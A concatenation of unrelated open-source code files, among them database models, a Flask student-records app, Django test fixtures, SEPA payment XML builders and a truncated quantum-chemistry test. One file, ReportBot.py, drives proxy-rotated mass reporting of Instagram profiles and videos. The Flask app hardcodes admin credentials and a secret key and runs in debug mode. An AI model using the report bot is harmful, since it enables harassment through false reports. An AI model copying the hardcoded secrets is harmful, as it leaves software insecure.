#KratosUnittest.TestLoader().loadTestsFromTestCases([ #### STANDALONE #### SMALL #### NIGTHLY #### VALIDATION #]) #) return suites if __name__ == '__main__': KratosMultiphysics.Logger.PrintInfo("Unittests", "\nRunning cpp unit tests ...") run_cpp_unit_tests.run() KratosMultiphysics.Logger.PrintInfo("Unittests", "Finished running cpp unit tests!") KratosMultiphysics.Logger.PrintInfo("Unittests", "\nRunning python tests ...") KratosUnittest.runTests(AssembleTestSuites()) KratosMultiphysics.Logger.PrintInfo("Unittests", "Finished python tests!")
2.1875
2
backend/api/models.py
mezidia/mezidia-airlines-backend
0
1817
<reponame>mezidia/mezidia-airlines-backend<filename>backend/api/models.py from sqlalchemy import Column, Integer, String, ForeignKey, Float from sqlalchemy.orm import relationship from .database import Base class Post(Base): __tablename__ = "posts" id = Column(Integer, primary_key=True, nullable=False, index=True) full_name = Column(String, nullable=False) last_place = Column(String, nullable=False) description = Column(String, nullable=False) percentage = Column(Float, default=0.0) image = Column(String) owner_id = Column(Integer, ForeignKey("users.id")) creator = relationship("User", back_populates="posts") class User(Base): __tablename__ = "users" id = Column(Integer, primary_key=True, nullable=False, index=True) name = Column(String, nullable=False) email = Column(String, nullable=False, unique=True) password = Column(String, nullable=False) phone_number = Column(String, nullable=False) posts = relationship("Post", back_populates="creator") class Code(Base): __tablename__ = "codes" id = Column(Integer, primary_key=True, nullable=False, index=True) code = Column(Integer, nullable=False)
2.84375
3
run.py
Ganeshrockz/Flask-Python-Dev
0
1818
<reponame>Ganeshrockz/Flask-Python-Dev<filename>run.py from flask import Flask, flash, render_template, redirect, url_for from flask.ext.pymongo import PyMongo from flask import request app=Flask(__name__) app.config['MONGO_DBNAME']='stud' app.config['MONGO_URI']='mongodb://localhost:27017/stud' mongo=PyMongo(app) """ @app.route('/add') def add(): user=mongo.db.users user.insert({"name":"Ganesh","age":19}) return "Added" @app.route('/find') def find(): user=mongo.db.users data=user.find_one({"name":"Ganesh"}) return data["name"] """ @app.route('/',methods=['GET', 'POST']) def dashboard(): if request.method == 'POST': name=request.form['name'] passw=request.form['password'] if name=="admin123" and passw=="<PASSWORD>": return redirect(url_for('display')) else: return render_template("dashboard.html",err="Login Failed") else: return render_template("dashboard.html") @app.route('/form',methods=['GET', 'POST']) def form(): if request.method == 'POST': user=mongo.db.student rollno=request.form['rollno'] name=request.form['name'] address=request.form['address'] year=request.form['year'] skills=request.form['skills'] phone=request.form['phone'] email=request.form['emailid'] user.insert({"Rollnumber":rollno,"StudentName":name,"Address":address,"Year":year,"Skills":skills,"PhoneNumber":phone,"EmailId":email}) return redirect(url_for('dashboard')) else: return render_template("form.html") @app.route('/display',methods=['GET', 'POST']) def display(): data=mongo.db.student record=[] for rec in data.find(): record.append({"Rollnumber":rec["Rollnumber"],"StudentName":rec["StudentName"],"Address":rec["Address"],"Year":rec["Year"],"Skills":rec["Skills"],"PhoneNumber":rec["PhoneNumber"],"EmailId":rec["EmailId"]}) app.logger.info(record) return render_template("display.html", studentdata=record) if __name__ == '__main__': app.secret_key = 'ganeshrockz' app.run(debug=True)
2.859375
3
resources/tests/conftest.py
jussiarpalahti/respa
0
1819
# -*- coding: utf-8 -*- import pytest import datetime from django.contrib.auth import get_user_model from django.contrib.auth.models import Group from rest_framework.test import APIClient, APIRequestFactory from resources.enums import UnitAuthorizationLevel from resources.models import Resource, ResourceType, Unit, Purpose, Day, Period from resources.models import Equipment, EquipmentAlias, ResourceEquipment, EquipmentCategory, TermsOfUse, ResourceGroup from resources.models import AccessibilityValue, AccessibilityViewpoint, ResourceAccessibility, UnitAccessibility from munigeo.models import Municipality @pytest.fixture def api_client(): return APIClient() @pytest.fixture def staff_api_client(staff_user): api_client = APIClient() api_client.force_authenticate(user=staff_user) return api_client @pytest.fixture def user_api_client(user): api_client = APIClient() api_client.force_authenticate(user=user) return api_client @pytest.fixture(params=[None, 'user', 'staff_user']) def all_user_types_api_client(request): api_client = APIClient() if request.param: api_client.force_authenticate(request.getfixturevalue(request.param)) return api_client @pytest.fixture def api_rf(): return APIRequestFactory() @pytest.mark.django_db @pytest.fixture def space_resource_type(): return ResourceType.objects.get_or_create(id="test_space", name="test_space", main_type="space")[0] @pytest.mark.django_db @pytest.fixture def space_resource(space_resource_type): return Resource.objects.create(type=space_resource_type, authentication="none", name="resource") @pytest.mark.django_db @pytest.fixture def test_unit(): return Unit.objects.create(name="unit", time_zone='Europe/Helsinki') @pytest.fixture def test_unit2(): return Unit.objects.create(name="unit 2", time_zone='Europe/Helsinki') @pytest.fixture def test_unit3(): return Unit.objects.create(name="unit 3", time_zone='Europe/Helsinki') @pytest.fixture def terms_of_use(): return TermsOfUse.objects.create( name_fi='testikäyttöehdot', name_en='test terms of use', text_fi='kaikki on kielletty', text_en='everything is forbidden', ) @pytest.mark.django_db @pytest.fixture def resource_in_unit(space_resource_type, test_unit, terms_of_use): return Resource.objects.create( type=space_resource_type, authentication="none", name="resource in unit", unit=test_unit, max_reservations_per_user=1, max_period=datetime.timedelta(hours=2), reservable=True, generic_terms=terms_of_use, specific_terms_fi='spesifiset käyttöehdot', specific_terms_en='specific terms of use', reservation_confirmed_notification_extra_en='this resource rocks' ) @pytest.mark.django_db @pytest.fixture def resource_in_unit2(space_resource_type, test_unit2): return Resource.objects.create( type=space_resource_type, authentication="none", name="resource in unit 2", unit=test_unit2, max_reservations_per_user=2, max_period=datetime.timedelta(hours=4), reservable=True, ) @pytest.mark.django_db @pytest.fixture def resource_in_unit3(space_resource_type, test_unit3): return Resource.objects.create( type=space_resource_type, authentication="none", name="resource in unit 3", unit=test_unit3, max_reservations_per_user=2, max_period=datetime.timedelta(hours=4), reservable=True, ) @pytest.mark.django_db @pytest.fixture def resource_with_opening_hours(resource_in_unit): p1 = Period.objects.create(start=datetime.date(2115, 1, 1), end=datetime.date(2115, 12, 31), resource=resource_in_unit, name='regular hours') for weekday in range(0, 7): Day.objects.create(period=p1, weekday=weekday, opens=datetime.time(8, 0), closes=datetime.time(18, 0)) resource_in_unit.update_opening_hours() return resource_in_unit @pytest.mark.django_db @pytest.fixture def exceptional_period(resource_with_opening_hours): parent = resource_with_opening_hours.periods.first() period = Period.objects.create(start='2115-01-10', end='2115-01-12', resource=resource_with_opening_hours, name='exceptional hours', exceptional=True, parent=parent) date = period.start Day.objects.create(period=period, weekday=date.weekday(), closed=True) date = date + datetime.timedelta(days=1) Day.objects.create(period=period, weekday=date.weekday(), opens='12:00', closes='13:00') date = date + datetime.timedelta(days=1) Day.objects.create(period=period, weekday=date.weekday(), closed=True) return period @pytest.mark.django_db @pytest.fixture def equipment_category(): return EquipmentCategory.objects.create( name='test equipment category' ) @pytest.mark.django_db @pytest.fixture def equipment(equipment_category): equipment = Equipment.objects.create(name='test equipment', category=equipment_category) return equipment @pytest.mark.django_db @pytest.fixture def equipment_alias(equipment): equipment_alias = EquipmentAlias.objects.create(name='test equipment alias', language='fi', equipment=equipment) return equipment_alias @pytest.mark.django_db @pytest.fixture def resource_equipment(resource_in_unit, equipment): data = {'test_key': 'test_value'} resource_equipment = ResourceEquipment.objects.create( equipment=equipment, resource=resource_in_unit, data=data, description='test resource equipment', ) return resource_equipment @pytest.mark.django_db @pytest.fixture def user(): return get_user_model().objects.create( username='test_user', first_name='Cem', last_name='Kaner', email='<EMAIL>', preferred_language='en' ) @pytest.mark.django_db @pytest.fixture def user2(): return get_user_model().objects.create( username='test_user2', first_name='Brendan', last_name='Neutra', email='<EMAIL>' ) @pytest.mark.django_db @pytest.fixture def staff_user(): return get_user_model().objects.create( username='test_staff_user', first_name='John', last_name='Staff', email='<EMAIL>', is_staff=True, preferred_language='en' ) @pytest.mark.django_db @pytest.fixture def unit_manager_user(resource_in_unit): user = get_user_model().objects.create( username='test_manager_user', first_name='Inspector', last_name='Lestrade', email='<EMAIL>', is_staff=True, preferred_language='en' ) user.unit_authorizations.create(subject=resource_in_unit.unit, level=UnitAuthorizationLevel.manager) return user @pytest.mark.django_db @pytest.fixture def general_admin(): return get_user_model().objects.create( username='test_general_admin', first_name='Genie', last_name='Manager', email='<EMAIL>', is_staff=True, is_general_admin=True, preferred_language='en' ) @pytest.mark.django_db @pytest.fixture def group(): return Group.objects.create(name='test group') @pytest.mark.django_db @pytest.fixture def purpose(): return Purpose.objects.create(name='test purpose', id='test-purpose') @pytest.fixture def resource_group(resource_in_unit): group = ResourceGroup.objects.create( identifier='test_group', name='Test resource group' ) group.resources.set([resource_in_unit]) return group @pytest.fixture def resource_group2(resource_in_unit2): group = ResourceGroup.objects.create( identifier='test_group_2', name='Test resource group 2' ) group.resources.set([resource_in_unit2]) return group @pytest.fixture def test_municipality(): municipality = Municipality.objects.create( id='foo', name='Foo' ) return municipality @pytest.fixture def accessibility_viewpoint_wheelchair(): vp = {"id": "10", "name_en": "I am a wheelchair user", "order_text": 10} return AccessibilityViewpoint.objects.create(**vp) @pytest.fixture def accessibility_viewpoint_hearing(): vp = {"id": "20", "name_en": "I am hearing impaired", "order_text": 20} return AccessibilityViewpoint.objects.create(**vp) @pytest.fixture def accessibility_value_green(): return AccessibilityValue.objects.create(value='green', order=10) @pytest.fixture def accessibility_value_red(): return AccessibilityValue.objects.create(value='red', order=-10) @pytest.fixture def resource_with_accessibility_data(resource_in_unit, accessibility_viewpoint_wheelchair, accessibility_viewpoint_hearing, accessibility_value_green, accessibility_value_red): """ Resource is wheelchair accessible, not hearing accessible, unit is accessible to both """ ResourceAccessibility.objects.create( resource=resource_in_unit, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_green ) ResourceAccessibility.objects.create( resource=resource_in_unit, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_red ) UnitAccessibility.objects.create( unit=resource_in_unit.unit, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_green ) UnitAccessibility.objects.create( unit=resource_in_unit.unit, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_green ) return resource_in_unit @pytest.fixture def resource_with_accessibility_data2(resource_in_unit2, accessibility_viewpoint_wheelchair, accessibility_viewpoint_hearing, accessibility_value_green, accessibility_value_red): """ Resource is hearing accessible, not wheelchair accessible, unit is accessible to both """ ResourceAccessibility.objects.create( resource=resource_in_unit2, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_red ) ResourceAccessibility.objects.create( resource=resource_in_unit2, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_green ) UnitAccessibility.objects.create( unit=resource_in_unit2.unit, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_green ) UnitAccessibility.objects.create( unit=resource_in_unit2.unit, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_green ) return resource_in_unit2 @pytest.fixture def resource_with_accessibility_data3(resource_in_unit3, accessibility_viewpoint_wheelchair, accessibility_viewpoint_hearing, accessibility_value_green, accessibility_value_red): """ Resource is accessible, unit is not """ ResourceAccessibility.objects.create( resource=resource_in_unit3, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_green ) ResourceAccessibility.objects.create( resource=resource_in_unit3, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_green ) UnitAccessibility.objects.create( unit=resource_in_unit3.unit, viewpoint=accessibility_viewpoint_wheelchair, value=accessibility_value_red ) UnitAccessibility.objects.create( unit=resource_in_unit3.unit, viewpoint=accessibility_viewpoint_hearing, value=accessibility_value_red ) return resource_in_unit3
1.90625
2
qcmetadataprinter/struct.py
x2dev/device_leeco_x2
0
1820
<reponame>x2dev/device_leeco_x2 #!/bin/python3 with open('../camera/QCamera2/stack/common/cam_intf.h', 'r') as f: data = f.read() f.closed start = data.find(' INCLUDE(CAM_INTF_META_HISTOGRAM') end = data.find('} metadata_data_t;') data = data[start:end] metadata = data.split("\n") metalist = list() for line in metadata: if (line.startswith(' INCLUDE')): foo = line.split(',') foo[0] = foo[0].replace('INCLUDE', 'PRINT') metalist.append(foo[0] + ", pMetadata);") with open('list.txt', 'w') as f: for item in metalist: f.write("%s\n" % item) f.closed
2.359375
2
abc/abc121/abc121d-2.py
c-yan/atcoder
1
1821
<reponame>c-yan/atcoder def g(A, n): if A == -1: return 0 return A // (2 * n) * n + max(A % (2 * n) - (n - 1), 0) def f(A, B): result = 0 for i in range(48): t = 1 << i if (g(B, t) - g(A - 1, t)) % 2 == 1: result += t return result A, B = map(int, input().split()) print(f(A, B))
2.65625
3
log_mysql.py
kizunai/Weather-Scrapy
0
1822
<reponame>kizunai/Weather-Scrapy import logging from logging.handlers import TimedRotatingFileHandler class MyLog(): def __init__(self, name, filename): self.logger = logging.getLogger(name) if not self.logger.handlers: self.logger.setLevel(logging.INFO) ch = TimedRotatingFileHandler(filename=filename, when='midnight', encoding="utf-8") ch.setLevel(logging.DEBUG) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') ch.setFormatter(formatter) self.logger.addHandler(ch) ''' logger = MyLog("test","log\\text.txt") logger.logger.debug('debug message') logger.logger.info('info message') logger.logger.warning('warn message') logger.logger.error('error message') logger.logger.critical('critical message') '''
2.859375
3
src/fiesta/urls.py
lerooze/django-fiesta
0
1823
<gh_stars>0 # urls.py from django.urls import path, register_converter from fiesta import converters from fiesta.views import views from rest_framework.urlpatterns import format_suffix_patterns # "http://django-sdmx.org/wsrest/" # "http://django-sdmx.org/ws/" register_converter(converters.ResourceConverter, 'res') register_converter(converters.AgencyConverter, 'age') register_converter(converters.ContextConverter, 'con') urlpatterns = [ path('wsreg/SubmitStructure/', views.SubmitStructureRequestView.as_view()), path('wsrest/schema/<con:context>/<age:agencyID>/<str:resourceID>', views.SDMXRESTfulSchemaView.as_view()), path('wsrest/schema/<con:context>/<age:agencyID>/<str:resourceID>/<str:version>', views.SDMXRESTfulSchemaView.as_view()), path('wsrest/<res:resource>/', views.SDMXRESTfulStructureView.as_view()), path('wsrest/<res:resource>/<age:agencyID>/', views.SDMXRESTfulStructureView.as_view()), path('wsrest/<res:resource>/<age:agencyID>/<str:resourceID>/', views.SDMXRESTfulStructureView.as_view()), path('wsrest/<res:resource>/<age:agencyID>/<str:resourceID>/' '<str:version>/', views.SDMXRESTfulStructureView.as_view()), ] urlpatterns = format_suffix_patterns(urlpatterns)
2.03125
2
code-wars/010.moving-zeros-to-the-end.py
code-knayam/DataStructureAlgorithms
0
1824
<filename>code-wars/010.moving-zeros-to-the-end.py # Write an algorithm that takes an array and moves all of the zeros to the end, preserving the order of the other elements. def move_zeros(array): #your code here new_array = [] new_index = 0 while len(array) > 0: item = array.pop(0) if item == 0 and not type(item) == bool : new_array.append(item) else: new_array.insert(new_index, item) new_index = new_index + 1 return new_array
4
4
sepa_generator/definitions.py
jason-gm/python_sepa
0
1825
def construct_tag_data(tag_name, attrs=None, value=None, sorting=None): data = { '_name': tag_name, '_attrs': attrs or [], '_value': value, } if sorting: data['_sorting'] = sorting return data def add_simple_child(data, child_friendly_name, child_tag_name, child_attrs=None, child_value=None): data[child_friendly_name] = construct_tag_data(child_tag_name, child_attrs, child_value) return data def construct_header(ctransfer): header = construct_tag_data('GrpHdr') header['_sorting'] = ['MsgId', 'CreDtTm', 'NbOfTxs', 'CtrlSum', 'InitgPty'] header['message_id'] = construct_tag_data('MsgId', value=ctransfer.uuid) header['creation_date_time'] = construct_tag_data('CreDtTm', value=ctransfer.timestamp) header['num_transactions'] = construct_tag_data('NbOfTxs', value=ctransfer.get_num_of_transactions()) header['control_sum'] = construct_tag_data('CtrlSum', value=ctransfer.get_control_sum()) header['initiating_party'] = add_simple_child(construct_tag_data('InitgPty'), 'name', 'Nm', [], ctransfer.debtor.name) return header def construct_iban(account, tag_name): iban_data = construct_tag_data(tag_name) iban_data['id'] = add_simple_child(construct_tag_data('Id'), 'iban', 'IBAN', [], account.iban) return iban_data def construct_bic(account, tag_name): bic_data = construct_tag_data(tag_name) bic_data['financial_instrument_id'] = add_simple_child(construct_tag_data('FinInstnId'), 'bic', 'BIC', [], account.bic) return bic_data def construct_address_data(account, tag_name): addr_data = construct_tag_data(tag_name) addr_data['name'] = construct_tag_data('Nm', value=account.name) if account.has_address(): address = construct_tag_data('PstlAdr') if account.country: address['country'] = construct_tag_data('Ctry', value=account.country) if account.street: address['addr_line_1'] = construct_tag_data('AdrLine', value=account.street) if account.postcode and account.city: address['addr_line_2'] = construct_tag_data('AdrLine', value="%s %s" % (account.postcode, account.city)) addr_data['address'] = address return addr_data def construct_transaction_data(ctransfer, transaction): transaction_information = construct_tag_data('CdtTrfTxInf') transaction_information['_sorting'] = ['PmtId', 'Amt', 'ChrgBr', 'UltmtDbtr', 'CdtrAgt', 'Cdtr', 'CdtrAcct', 'UltmtCdtr', 'Purp', 'RmtInf'] transaction_information['payment_id'] = add_simple_child( data=add_simple_child(data=construct_tag_data('PmtId', sorting=['InstrId', 'EndToEndId']), child_friendly_name='instruction', child_tag_name='InstrId', child_value=transaction.uuid), child_friendly_name='eref', child_tag_name='EndToEndId', child_value=transaction.eref) transaction_information['amount'] = add_simple_child(data=construct_tag_data('Amt'), child_friendly_name='amount', child_tag_name='InstdAmt', child_attrs=[('Ccy', ctransfer.currency)], child_value=transaction.get_amount()) transaction_information['charge_bearer'] = construct_tag_data('ChrgBr', value='SLEV') if ctransfer.debtor.use_ultimate: transaction_information['ultimate_debtor'] = add_simple_child(data=construct_tag_data('UltmtDbtr'), child_friendly_name='name', child_tag_name='Nm', child_value=ctransfer.debtor.name) transaction_information['creditor_agent'] = construct_bic(transaction.creditor, 'CdtrAgt') transaction_information['creditor_data'] = construct_address_data(transaction.creditor, 'Cdtr') transaction_information['creditor_account'] = construct_iban(transaction.creditor, 'CdtrAcct') if transaction.creditor.use_ultimate: transaction_information['ultimate_creditor'] = add_simple_child(data=construct_tag_data('UltmtCdtr'), child_friendly_name='name', child_tag_name='Nm', child_value=transaction.creditor.name) transaction_information['purpose'] = add_simple_child(data=construct_tag_data('Purp'), child_friendly_name='code', child_tag_name='Cd', child_value=transaction.ext_purpose) if not transaction.use_structured: transaction_information['remote_inf'] = add_simple_child(data=construct_tag_data('RmtInf'), child_friendly_name='unstructured', child_tag_name='Ustrd', child_value=transaction.purpose) else: rmt_inf = construct_tag_data('RmtInf') rmt_inf_strd = add_simple_child(data=construct_tag_data('Strd'), child_friendly_name='additional_info', child_tag_name='AddtlRmtInf', child_value=transaction.purpose) rmt_tp = construct_tag_data('Tp') rmt_tp['code_or_property'] = add_simple_child(data=construct_tag_data('CdOrPrtry'), child_friendly_name='code', child_tag_name='Cd', child_value='SCOR') rmt_creditor_ref_inf = add_simple_child(data=construct_tag_data('CdtrRefInf'), child_friendly_name='reference', child_tag_name='Ref', child_value=transaction.cref) rmt_creditor_ref_inf['tp'] = rmt_tp rmt_inf_strd['creditor_ref_information'] = rmt_creditor_ref_inf rmt_inf['structured'] = rmt_inf_strd transaction_information['remote_inf'] = rmt_inf return transaction_information def construct_payment_information(ctransfer): payment_inf = construct_tag_data('PmtInf') payment_inf['_sorting'] = ['PmtInfId', 'PmtMtd', 'BtchBookg', 'NbOfTxs', 'CtrlSum', 'PmtTpInf', 'ReqdExctnDt', 'Dbtr', 'DbtrAcct', 'DbtrAgt', 'ChrgBr', 'CdtTrfTxInf'] payment_inf['payment_id'] = construct_tag_data('PmtInfId', value=ctransfer.payment_id) payment_inf['payment_method'] = construct_tag_data('PmtMtd', value='TRF') payment_inf['batch'] = construct_tag_data('BtchBookg', value=str(ctransfer.batch).lower()) payment_inf['num_transactions'] = construct_tag_data('NbOfTxs', value=ctransfer.get_num_of_transactions()) payment_inf['control_sum'] = construct_tag_data('CtrlSum', value=ctransfer.get_control_sum()) payment_instruction = construct_tag_data('PmtTpInf') payment_instruction['_sorting'] = ['InstrPrty', 'SvcLvl'] payment_instruction['priority'] = construct_tag_data('InstrPrty', value='NORM') payment_instruction['service_level'] = add_simple_child(construct_tag_data('SvcLvl'), 'code', 'Cd', [], 'SEPA') payment_inf['instruction'] = payment_instruction payment_inf['requested_execution_time'] = construct_tag_data('ReqdExctnDt', value=ctransfer.execution_time) payment_inf['debtor'] = construct_address_data(ctransfer.debtor, 'Dbtr') payment_inf['debtor_account'] = construct_iban(ctransfer.debtor, 'DbtrAcct') payment_inf['debtor_agent'] = construct_bic(ctransfer.debtor, 'DbtrAgt') payment_inf['charge_bearer'] = construct_tag_data('ChrgBr', value='SLEV') for i, payment in enumerate(ctransfer.transactions): transfer_information = construct_transaction_data(ctransfer, payment) payment_inf['transfer_no_%s' % i] = transfer_information return payment_inf def construct_document(ctransfer): root = construct_tag_data('Document', [('xmlns', 'urn:iso:std:iso:20022:tech:xsd:pain.001.001.03')]) message = construct_tag_data('CstmrCdtTrfInitn') message['_sorting'] = ['GrpHdr', 'PmtInf'] message['header'] = construct_header(ctransfer) message['payment_information'] = construct_payment_information(ctransfer) root['message'] = message return root
2.078125
2
__main__.py
miezebieze/scott-launcher
1
1826
from enum import Enum from window import Window D = Enum ('Directions','N NE E SE S SW W NW') selector_map = { D.NW: [0.5,0.5], D.N: [1.5,0], D.NE: [2.5,0.5], D.W: [0,1.5], D.E: [3,1.5], D.SW: [0.5,2.5], D.S: [1.5,3], D.SE: [2.5,2.5], } selector_size = 100 window_size = selector_size*4 window = Window (window_size,window_size,selector_map,selector_size,selector_size) # set actions here from functools import partial def say (something): print (''.join (('Me: "',something,'"'))) window.actions[D.NW] = partial (say,'northwast') window.actions[D.N] = partial (say,'north') window.actions[D.NE] = partial (say,'neorthest') window.actions[D.W] = partial (say,'western') window.actions[D.E] = partial (say,'easy') window.actions[D.SW] = partial (say,'suess whest') window.actions[D.S] = partial (say,'sissy') window.actions[D.SE] = partial (say,'seoul') window.go ()
2.59375
3
cride/circles/serializers.py
monteals/C-Ride
0
1827
<gh_stars>0 from rest_framework import serializers from rest_framework.validators import UniqueValidator from cride.circles.models import Circle class CircleSerializer(serializers.Serializer): name = serializers.CharField() slug_name = serializers.SlugField() rides_taken = serializers.IntegerField() rides_offered = serializers.IntegerField() members_limit = serializers.IntegerField() class CreateCircleSerializer(serializers.Serializer): name = serializers.CharField(max_length=140) slug_name = serializers.CharField(max_length=40, validators=[UniqueValidator(queryset=Circle.objects.all())]) about = serializers.CharField(max_length=255, required=False) def create(self, data): return Circle.objects.create(**data)
2.390625
2
figures/collide1a.py
brandon-rhodes/pycon2010-mighty-dictionary
22
1828
<gh_stars>10-100 import _dictdraw, sys d = {} surface = _dictdraw.draw_dictionary(d, [4]) surface.write_to_png(sys.argv[1])
2.03125
2
ReportBot.py
SeveNNoff/InstagramReportBot
1
1829
# coding=utf-8 #!/usr/bin/env python3 from libs.check_modules import check_modules from sys import exit from os import _exit check_modules() from os import path from libs.logo import print_logo from libs.utils import print_success from libs.utils import print_error from libs.utils import ask_question from libs.utils import print_status from libs.utils import parse_proxy_file from libs.proxy_harvester import find_proxies from libs.attack import report_profile_attack from libs.attack import report_video_attack from multiprocessing import Process from colorama import Fore, Back, Style def chunks(lst, n): """Yield successive n-sized chunks from lst.""" for i in range(0, len(lst), n): yield lst[i:i + n] def profile_attack_process(username, proxy_list): if (len(proxy_list) == 0): for _ in range(10): report_profile_attack(username, None) return for proxy in proxy_list: report_profile_attack(username, proxy) def video_attack_process(video_url, proxy_list): if (len(proxy_list) == 0): for _ in range(10): report_video_attack(video_url, None) return for proxy in proxy_list: report_video_attack(video_url, proxy) def video_attack(proxies): video_url = ask_question("Enter the link of the video you want to report") print(Style.RESET_ALL) if (len(proxies) == 0): for k in range(5): p = Process(target=video_attack_process, args=(video_url, [],)) p.start() print_status(str(k + 1) + ". Transaction Opened!") if (k == 5): print() return chunk = list(chunks(proxies, 10)) print("") print_status("Video complaint attack is on!\n") i = 1 for proxy_list in chunk: p = Process(target=video_attack_process, args=(video_url, proxy_list,)) p.start() print_status(str(i) + ". Transaction Opened!") if (k == 5): print() i = i + 1 def profile_attack(proxies): username = ask_question("Enter the username of the person you want to report") print(Style.RESET_ALL) if (len(proxies) == 0): for k in range(5): p = Process(target=profile_attack_process, args=(username, [],)) p.start() print_status(str(k + 1) + ". Transaction Opened!") return chunk = list(chunks(proxies, 10)) print("") print_status("Profile complaint attack is starting!\n") i = 1 for proxy_list in chunk: p = Process(target=profile_attack_process, args=(username, proxy_list,)) p.start() print_status(str(i) + ". Transaction Opened!") if (k == 5): print() i = i + 1 def main(): print_success("Modules loaded!\n") ret = ask_question("Would you like to use a proxy? [Y / N]") proxies = [] if (ret == "Y" or ret == "y"): ret = ask_question("Would you like to collect your proxies from the internet? [Y / N]") if (ret == "Y" or ret == "y"): print_status("Gathering proxy from the Internet! This may take a while.\n") proxies = find_proxies() elif (ret == "N" or ret == "n"): print_status("Please have a maximum of 50 proxies in a file!") file_path = ask_question("Enter the path to your proxy list") proxies = parse_proxy_file(file_path) else: print_error("Answer not understood, exiting!") exit() print_success(str(len(proxies)) + " Number of proxy found!\n") elif (ret == "N" or ret == "n"): pass else: print_error("Answer not understood, exiting!") exit() print("") print_status("1 - Report Profile.") print_status("2 - Report a video.") report_choice = ask_question("Please select the complaint method") print("") if (report_choice.isdigit() == False): print_error("The answer is not understood.") exit(0) if (int(report_choice) > 2 or int(report_choice) == 0): print_error("The answer is not understood.") exit(0) if (int(report_choice) == 1): profile_attack(proxies) elif (int(report_choice) == 2): video_attack(proxies) if __name__ == "__main__": print_logo() try: main() print(Style.RESET_ALL) except KeyboardInterrupt: print("\n\n" + Fore.RED + "[*] Program is closing!") print(Style.RESET_ALL) _exit(0)
2.390625
2
openfermioncirq/variational/ansatzes/default_initial_params_test.py
viathor/OpenFermion-Cirq
0
1830
<gh_stars>0 # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy import pytest import cirq import openfermion from openfermioncirq import ( HamiltonianObjective, LowRankTrotterAnsatz, SplitOperatorTrotterAnsatz, SwapNetworkTrotterAnsatz, SwapNetworkTrotterHubbardAnsatz, VariationalStudy, prepare_gaussian_state, simulate_trotter) from openfermioncirq.trotter import ( LINEAR_SWAP_NETWORK, LOW_RANK, LowRankTrotterAlgorithm, SPLIT_OPERATOR) # 4-qubit random DiagonalCoulombHamiltonian diag_coul_hamiltonian = openfermion.random_diagonal_coulomb_hamiltonian( 4, real=True, seed=47141) # 4-qubit H2 2-2 with bond length 0.7414 bond_length = 0.7414 geometry = [('H', (0., 0., 0.)), ('H', (0., 0., bond_length))] h2_hamiltonian = openfermion.load_molecular_hamiltonian( geometry, 'sto-3g', 1, format(bond_length), 2, 2) # 4-qubit LiH 2-2 with bond length 1.45 bond_length = 1.45 geometry = [('Li', (0., 0., 0.)), ('H', (0., 0., bond_length))] lih_hamiltonian = openfermion.load_molecular_hamiltonian( geometry, 'sto-3g', 1, format(bond_length), 2, 2) @pytest.mark.parametrize( 'ansatz, trotter_algorithm, order, hamiltonian, atol', [ (SwapNetworkTrotterAnsatz(diag_coul_hamiltonian, iterations=1), LINEAR_SWAP_NETWORK, 1, diag_coul_hamiltonian, 5e-5), (SplitOperatorTrotterAnsatz(diag_coul_hamiltonian, iterations=1), SPLIT_OPERATOR, 1, diag_coul_hamiltonian, 5e-5), (LowRankTrotterAnsatz(h2_hamiltonian, iterations=1), LOW_RANK, 0, h2_hamiltonian, 5e-5), (LowRankTrotterAnsatz(lih_hamiltonian, iterations=1, final_rank=3), LowRankTrotterAlgorithm(final_rank=3), 0, lih_hamiltonian, 5e-5), (SwapNetworkTrotterHubbardAnsatz(2, 2, 1.0, 4.0, iterations=1), LINEAR_SWAP_NETWORK, 1, openfermion.get_diagonal_coulomb_hamiltonian( openfermion.reorder( openfermion.fermi_hubbard(2, 2, 1.0, 4.0), openfermion.up_then_down) ), 5e-5) ]) def test_trotter_ansatzes_default_initial_params_iterations_1( ansatz, trotter_algorithm, order, hamiltonian, atol): """Check that a Trotter ansatz with one iteration and default parameters is consistent with time evolution with one Trotter step.""" objective = HamiltonianObjective(hamiltonian) qubits = ansatz.qubits if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian): one_body = hamiltonian.one_body elif isinstance(hamiltonian, openfermion.InteractionOperator): one_body = hamiltonian.one_body_tensor if isinstance(ansatz, SwapNetworkTrotterHubbardAnsatz): occupied_orbitals = (range(len(qubits)//4), range(len(qubits)//4)) else: occupied_orbitals = range(len(qubits)//2) preparation_circuit = cirq.Circuit( prepare_gaussian_state( qubits, openfermion.QuadraticHamiltonian(one_body), occupied_orbitals=occupied_orbitals ) ) # Compute value using ansatz circuit and objective circuit = cirq.resolve_parameters( preparation_circuit + ansatz.circuit, ansatz.param_resolver(ansatz.default_initial_params())) result = circuit.final_wavefunction( qubit_order=ansatz.qubit_permutation(qubits)) obj_val = objective.value(result) # Compute value using study study = VariationalStudy( 'study', ansatz, objective, preparation_circuit=preparation_circuit) study_val = study.value_of(ansatz.default_initial_params()) # Compute value by simulating time evolution if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian): half_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian( one_body=hamiltonian.one_body, two_body=0.5 * hamiltonian.two_body) elif isinstance(hamiltonian, openfermion.InteractionOperator): half_way_hamiltonian = openfermion.InteractionOperator( constant=hamiltonian.constant, one_body_tensor=hamiltonian.one_body_tensor, two_body_tensor=0.5 * hamiltonian.two_body_tensor) simulation_circuit = cirq.Circuit( simulate_trotter( qubits, half_way_hamiltonian, time=ansatz.adiabatic_evolution_time, n_steps=1, order=order, algorithm=trotter_algorithm) ) final_state = ( preparation_circuit + simulation_circuit).final_wavefunction() correct_val = openfermion.expectation( 